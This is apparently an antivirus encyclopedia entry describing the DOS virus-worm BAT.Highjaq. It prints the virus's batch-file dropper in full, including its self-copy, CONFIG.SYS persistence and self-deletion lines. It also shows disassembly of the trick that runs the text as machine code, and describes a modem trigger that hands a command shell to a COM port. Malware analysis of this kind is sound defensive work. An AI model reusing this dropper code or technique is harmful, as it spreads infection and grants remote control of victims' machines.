Name: BAT.Highjaq.140 Category: Viruses Description: Details BAT.Highjaq.1400 It is not a dangerous virus-worm that places itself in BAT files and device drivers. The virus is not memory resident and does not have a TSR code that infects the files, but being executed as a device driver, the virus stays memory resident and hooks INT 21h for "AreYouHere?" call and INT 8 for the trigger routine. The virus has two part of the code. The first part is text data. It is executed when the virus runs as a BAT file. The second part is binary data and it takes control when the virus is executed as a COM file or device driver. The text part of code looks as follows (the labels also pass the control when that data is executed as a binary code): ::pFqD @ctty nul copy/b %0.bat+%0 c:q.com dir *.arj/s/b|c:q.com/i :qlpj if errorlevel 1 goto qWpU ren c:q.com UMKQYGWK.5KA echo INSTALLHIGH=C:UMKQYGWK.5KA>>c:config.sys :qWpU for %%a in (%0 %0.bat) do if exist %%a set q=%%a del c:q.com ctty con @del %q% Being executed as a BAT file the virus copies itself to C:Q.COM file (third line). That is the COM dropper that is used to infect other files. The virus pays attention, has the infected file executed only by the file name or by the full file name, and to solve that problem the virus use the command: COPY %0.BAT+%0 to copy its code. Then the virus runs DIR command to find all ARJ archives in the directory tree on the current disk, and passes their names to the Q.COM file (fourth line). The Q.COM file returns the Errorlevel that indicates that the TSR code of the virus is in the memory. If the memory is not infected (i.e. the virus hasn't been loaded as a device driver), the virus renames its COM dropper to the UMKQYGWK.5KA name and writes the string: INSTALLHIGH=C:UMKQYGWK.5KA to the end of the C:CONFIG.SYS file (7th and 8th lines). As a result the virus adds its name to the list of system device drivers. Then the virus deletes the host file and the C:Q.COM file. Being executed as a COM file (see third line) the virus gets the name of ARJ archives from the standard input, checks the archive and appends the block of data to the end of the archive. That block of data contains the virus code named as a /WINSTART.BAT file. The virus does not pack its code while saving it to the archive, but keeps is as a "stored" data. The binary code of the virus takes the control from the file header after several jumps: 0100 3A 3A CMP BH,[BP+SI] ; text: ::pFqD 0102 70 46 JO Jmp_a 0104 71 44 JNO Jmp_a all. . . . . . 0149 3A DB 3Ah ; text: :qlpj 014A Jmp_a: 014A 71 6C JNO Jmp_b 014C 70 6A JO Jmp_b .... . . . . . 01B7 3A DB 3Ah ; text: :qWpU 01B8 Jmp_b: 01B8 71 57 JNO Main_Code 01BA 70 55 JO Main_Code .... . . . . . 0211 Main_Code: .... . . . . . The text strings are executed by the processor as the real assembler instructions, and the trick with JO/JNO instructions in any case brings the control to the binary virus code. That code detects, is the virus executed as a device driver (there are no arguments in command line) or as a COM file (there is the argument /i, see BAT code) and switches the control to one of two routines. Being executed as a device driver the virus hooks INT 8, 21h and stays memory resident. Because the virus in device driver has not the format of a system driver (there are no FFFFFFFFh at the beginning of the file), the virus cannot to keep itself in the memory by a device request, but uses DOS Keep call INT 21h, AH=31h instead. By hooking INT 8 the virus runs its internal counters and if the computer is not under Windows 3.x, the virus some time after reboots the system. By hooking INT 21h the virus intercepts "AreYouHere?" call (AX=FEFEh, the virus returns SI=1994h) and also terminates GetFileAttributes call (INT 21h, AX=4300) if the name of the file begins with "/W". I see no reason for that trick, maybe the virus in some protect its droppers in ARJ archives? (they are stored by name /WINSTART.BAT in there) Being executed as a device driver or a COM file without arguments, the virus also gets the host file name and sets its attributes to Hidden and ReadOnly. The virus also checks the system COM ports, and reads the data from Scratch Register and Line Status Register of each port. If reading from the Scratch Register returns the 'Q' character (51h), the virus launches the trigger routine. If the bits DataSetReady and ClearToSend are set in the Line Status Register, the virus writes the port number to the DOS kernel at some fixed address. I see no reason for that action. When the trigger routine is run, it clears the screen, initialyzes the ports, and writes the string ATL0M0A to the COM port by using INT 14h calls (the is the bytes 0Dh, 0Ah). The modem gurus can describe more accurate that will answer the modem, but I see that the virus mutes and turns off the modem speaker. Then the virus by using the same way outputs to the COM port the line: HIGHJAQ on COMx:38400,N,8,1 where COMx is the number of the port that is accessed. Then the virus hooks INT 8 and executes the C:COMMAND.COM file with the parameters: C: COM1 /E:1024/P/F The hooked INT 8 points to another handler (not to handler that is described above). That handler checks the modem Carrier Detect bit and reboots the computer if the carrier is detected.